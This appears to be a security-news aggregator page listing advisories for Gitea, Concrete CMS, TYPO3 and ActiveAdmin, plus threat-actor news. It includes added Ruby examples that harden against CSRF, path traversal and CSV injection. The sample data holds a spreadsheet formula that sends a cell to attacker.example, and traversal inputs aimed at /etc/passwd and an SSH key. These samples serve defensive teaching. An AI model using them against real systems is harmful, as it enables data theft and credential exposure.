Security
Headlines

Tag

#git

Gentoo Linux Security Advisory 202312-13

Gentoo Linux Security Advisory 202312-13 - Multiple vulnerabilities have been discovered in Gitea, the worst of which could result in information leakage. Versions below 1.20.6 are affected; 1.20.6 and later contain the fixes.

Packet Storm
Tags: #vulnerability #web #mac #linux #git
How to recognize AI-generated phishing mails

Cybercriminals now have AI to write their phishing emails, which might well improve their success rates. Here's what to watch out for.

Carbanak Banking Malware Resurfaces with New Ransomware Tactics

The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics. "The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023. "Carbanak returned last month through new

GHSA-qp42-5pj7-4ccm: Concrete CMS Cross Site Request Forgery (CSRF)

Concrete CMS 9 before 9.2.3 is vulnerable to Cross Site Request Forgery (CSRF) via `/ccm/system/dialogs/logs/delete_all/submit`. An attacker can force an admin user to delete server report logs on a web application to which they are currently authenticated.
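Added example (not Concrete CMS code) showing the pattern behind the bug above: a state-changing admin endpoint that acts on any request carrying a valid session cookie, beside the same endpoint gated by a per-session synchronizer token. The Session struct, the in-memory log list and the function names are hypothetical.

```ruby
require "securerandom"

# Added example, not Concrete CMS code. Models a "delete all logs" endpoint
# that trusts the session cookie alone (CSRF-able) and a hardened variant that
# also demands a per-session token. All names here are hypothetical.

Session = Struct.new(:user, :csrf_token)

def new_session(user)
  Session.new(user, SecureRandom.hex(32))
end

# Constant-time comparison so token checking does not leak by timing.
def secure_equal?(a, b)
  return false unless a.is_a?(String) && b.is_a?(String)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Vulnerable: only asks "is the caller an authenticated admin?". The browser
# attaches the admin's cookie to a form auto-submitted from any origin, so a
# visit to an attacker page is enough to trigger the deletion.
def delete_all_logs_vulnerable(session, logs)
  return :forbidden unless session && session.user == :admin
  logs.clear
  :deleted
end

# Hardened: additionally requires the session's CSRF token in the request
# body. The same-origin policy keeps that token out of reach of a cross-site
# page, so a forged request arrives without it (or with a guess) and fails.
def delete_all_logs_hardened(session, logs, submitted_token)
  return :forbidden unless session && session.user == :admin
  return :forbidden unless secure_equal?(session.csrf_token, submitted_token)
  logs.clear
  :deleted
end

# Drives both endpoints with a forged request (no token), then with a
# legitimate same-origin submission, and reports what the admin would see.
def demo
  admin = new_session(:admin)
  vuln_logs = %w[report-1.log report-2.log] # constructed sample data
  hard_logs = %w[report-1.log report-2.log]
  {
    forged_vs_vulnerable: delete_all_logs_vulnerable(admin, vuln_logs),
    vulnerable_logs_left: vuln_logs.size,
    forged_vs_hardened:   delete_all_logs_hardened(admin, hard_logs, nil),
    hardened_logs_left:   hard_logs.size,
    legit_vs_hardened:    delete_all_logs_hardened(admin, hard_logs, admin.csrf_token),
  }
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

The forged request succeeds against the first handler and wipes the logs; against the second it is rejected and the logs survive, while the admin's own submission (which carries the token) still works. In a real application the token is rendered into the form by the server and, for defence in depth, the cookie also gets `SameSite=Lax` or `Strict`.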

Cloud Atlas' Spear-Phishing Attacks Target Russian Agro and Research Companies

The threat actor referred to as Cloud Atlas has been linked to a set of spear-phishing attacks on Russian enterprises. Targets included a Russian agro-industrial enterprise and a state-owned research company, according to a report from F.A.C.C.T., a standalone cybersecurity company formed after Group-IB's formal exit from Russia earlier this year. Cloud Atlas, active since at

GHSA-3gjc-mp82-fj4q: TYPO3 Arbitrary File Read via Directory Traversal

In TYPO3 11.5.24, the filelist component allows attackers (who have access to the administrator panel) to read arbitrary files via directory traversal in the baseuri field, as demonstrated by POST `/typo3/record/edit` with `../../../` in `data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF]`.
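Added example (not TYPO3 code) of the containment check a storage base path setting needs so that an admin-supplied value with `../` segments cannot point a file listing outside the web root. `WEB_ROOT`, the function name and the sample paths are hypothetical.

```ruby
# Added example, not TYPO3 code. Resolves a configured storage base path
# against the permitted root and rejects anything that escapes it.
# WEB_ROOT, safe_storage_path and the sample inputs are hypothetical.

WEB_ROOT = "/var/www/html".freeze

# Returns the absolute path if `base_path` stays inside `root`, else nil.
# Pure string resolution (no filesystem access), so it runs anywhere; apply
# it to the already URL-decoded value, since it does not decode "%2e%2e".
def safe_storage_path(base_path, root = WEB_ROOT)
  return nil unless base_path.is_a?(String)
  return nil if base_path.include?("\0")      # NUL truncates paths in C-level APIs
  return nil if base_path.start_with?("~")     # expand_path would substitute a home dir
  root_abs = File.expand_path(root)
  resolved = File.expand_path(base_path, root) # collapses "." and ".." segments
  return resolved if resolved == root_abs
  # Require the separator: "/var/www/html2" must not count as inside "/var/www/html".
  resolved.start_with?(root_abs + File::SEPARATOR) ? resolved : nil
end

# Constructed inputs: values an admin might legitimately set, and the
# advisory's traversal as it reaches the storage record.
SAMPLE_BASE_PATHS = [
  "fileadmin/",              # ok: /var/www/html/fileadmin
  "uploads/../fileadmin",    # ok: ".." stays inside the root
  "../../../etc/passwd",     # rejected: resolves to /etc/passwd
  "fileadmin/../../secret",  # rejected: resolves to /var/www/secret
  "/etc/passwd",             # rejected: absolute path outside the root
  "~/.ssh/id_rsa",           # rejected: tilde expansion
].freeze

def check_all(paths = SAMPLE_BASE_PATHS)
  paths.map { |p| [p, safe_storage_path(p)] }.to_h
end

check_all.each { |p, r| puts "#{p.inspect} -> #{r.inspect}" } if $PROGRAM_NAME == __FILE__
```

Once the directory exists on disk, compare `File.realpath` of the resolved path against the root as well, so a symlink placed under the web root cannot point the listing elsewhere.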

Adobe Real-Time CDP: Personalized Customer Experience

By Owais Sultan. In the current high-tech age, consumer data is a business's most important asset as businesses progressively shift towards… This is a post from HackRead.com.

GHSA-rqxc-9p8h-xqgq: ActiveAdmin vulnerable to CSV injection

csv_builder.rb in ActiveAdmin (aka Active Admin) before 3.2.0 allows CSV injection.
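Added example (not ActiveAdmin's code) showing what CSV injection is and the usual mitigation: a cell that begins with `=`, `+`, `-` or `@` (or a tab or carriage return placed before one) is evaluated as a formula when the export is opened in a spreadsheet, so a user-controlled field becomes code. The helper names and the sample rows are constructed.

```ruby
require "csv"

# Added example, not ActiveAdmin's code. Neutralises formula triggers at the
# start of a cell before the export is written. FORMULA_TRIGGERS, csv_safe,
# build_csv and the sample rows are constructed for this illustration.

FORMULA_TRIGGERS = ["=", "+", "-", "@", "\t", "\r"].freeze

# Escapes one cell. Numbers are left alone (a negative balance must stay -3);
# for strings, a leading apostrophe makes spreadsheet apps treat the cell as
# text, so "=1+1" is displayed rather than computed.
def csv_safe(value)
  return value.to_s if value.is_a?(Numeric)
  s = value.to_s
  FORMULA_TRIGGERS.any? { |t| s.start_with?(t) } ? "'#{s}" : s
end

# Builds the export with every cell passed through csv_safe, leaving CSV's
# own quoting (commas, quotes, newlines) to the library.
def build_csv(headers, rows)
  CSV.generate do |csv|
    csv << headers
    rows.each { |row| csv << row.map { |cell| csv_safe(cell) } }
  end
end

# Constructed sample: two hostile display names and one benign row.
SAMPLE_HEADERS = %w[name note balance].freeze
SAMPLE_ROWS = [
  ["alice", "=HYPERLINK(\"http://attacker.example/?c=\"&A1,\"click\")", 10],
  ["bob",   "@SUM(1+1)", -3],
  ["carol", "plain text", 7],
].freeze

def sample_export
  build_csv(SAMPLE_HEADERS, SAMPLE_ROWS)
end

puts sample_export if $PROGRAM_NAME == __FILE__
```

The escaping has to happen at write time on the already-formatted string, after number formatting, otherwise a legitimately negative amount rendered as `-3.00` would be mangled; and the apostrophe is a display-layer defence only, so the export should still be served with a content type that does not invite the browser to open it in place.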

British LAPSUS$ Teen Members Sentenced for High-Profile Attacks

Two British teens part of the LAPSUS$ cyber crime and extortion gang have been sentenced for their roles in orchestrating a string of high-profile attacks against a number of companies. Arion Kurtaj, an 18-year-old from Oxford, has been sentenced to an indefinite hospital order due to his intent to get back to cybercrime "as soon as possible," BBC reported. Kurtaj, who is autistic, was

GHSA-jpfp-xq3p-4h3r: Deis Workflow Manager race condition vulnerability

** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Deis Workflow Manager up to 2.3.2 and classified as problematic. An unknown part of the code is affected; the manipulation leads to a race condition. Attack complexity is rated high and exploitation is considered difficult. Upgrading to version 2.3.3 addresses this issue; the patch is commit 31fe3bccbdde134a185752e53380330d16053f7f. Upgrading the affected component is recommended. The associated identifier of this vulnerability is VDB-248847. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.